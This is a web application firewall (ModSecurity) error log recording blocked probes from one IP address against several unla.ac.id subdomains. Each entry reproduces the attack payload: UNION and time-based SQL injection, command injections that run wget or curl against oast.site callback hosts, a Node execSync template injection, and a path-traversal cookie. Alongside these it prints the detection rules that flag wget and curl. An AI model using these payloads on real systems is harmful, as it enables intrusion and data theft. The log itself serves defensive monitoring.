[Tue Aug 29 11:31:22.488216 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "www.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAPMmIIAAAAY"]
[Tue Aug 29 11:31:22.498291 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAO88BYAAAAF"]
[Tue Aug 29 11:31:22.519118 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "ft.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQFcRYAAAAn"]
[Tue Aug 29 11:31:23.322738 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQFcRcAAAAn"]
[Tue Aug 29 11:31:23.324480 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAPMmIQAAAAY"]
[Tue Aug 29 11:31:23.328953 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQEGHoAAAAm"]
[Tue Aug 29 11:31:23.329298 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAN@5EUAAAAO"]
[Tue Aug 29 11:31:23.330696 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAPahx8AAAAL"]
[Tue Aug 29 11:31:24.343988 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgm9xwp578nirht.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQEGHwAAAAm"]
[Tue Aug 29 11:31:24.356568 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10nMCo-f0AAAP8GzoAAAAV"]
[Tue Aug 29 11:31:24.581198 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgy3af819epqjcs.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQMrqQAAAAu"]
[Tue Aug 29 11:31:24.583783 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlggcwmq4mneko3o.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQFcRsAAAAn"]
[Tue Aug 29 11:31:24.593408 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg7iiej4ojm1jy9.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAP@MyMAAAAZ"]
[Tue Aug 29 11:31:24.594238 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgstu15mqmj7pqj.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQJWscAAAAr"]
[Tue Aug 29 11:31:24.636511 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg5uo5fhkeacrao.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAP@MyQAAAAZ"]
[Tue Aug 29 11:31:25.301278 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg46jm3drdxm7e4.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQJWskAAAAr"]
[Tue Aug 29 11:31:25.303485 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg561qyjqphk1cf.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQR440AAAAz"]
[Tue Aug 29 11:31:25.319709 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgu8sja4km5dbax.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQOv1cAAAAw"]
[Tue Aug 29 11:31:25.355856 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlga6ex641xfudkf.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAN@5EwAAAAO"]
[Tue Aug 29 11:31:25.370121 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlghgh5naqurzupc.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQR45AAAAAz"]
[Tue Aug 29 11:31:25.438701 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgxtfkdz8tfq3u6.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAPahyYAAAAL"]
[Tue Aug 29 11:31:26.687417 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg9mh6fg1oe3ag6.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQFcSUAAAAn"]
[Tue Aug 29 11:31:26.707574 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg43eqxy5w787j8.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQTKHUAAAA1"]
[Tue Aug 29 11:31:26.753381 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgx3t3pa1ryt1ht.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAPahyoAAAAL"]
[Tue Aug 29 11:31:26.769544 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg79qa9scyygapy.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQTKHYAAAA1"]
[Tue Aug 29 11:31:26.787124 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgfts4cz7aug1gd.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQQylEAAAAy"]
[Tue Aug 29 11:31:27.347989 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAPahysAAAAL"]
[Tue Aug 29 11:31:27.349163 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQFcScAAAAn"]
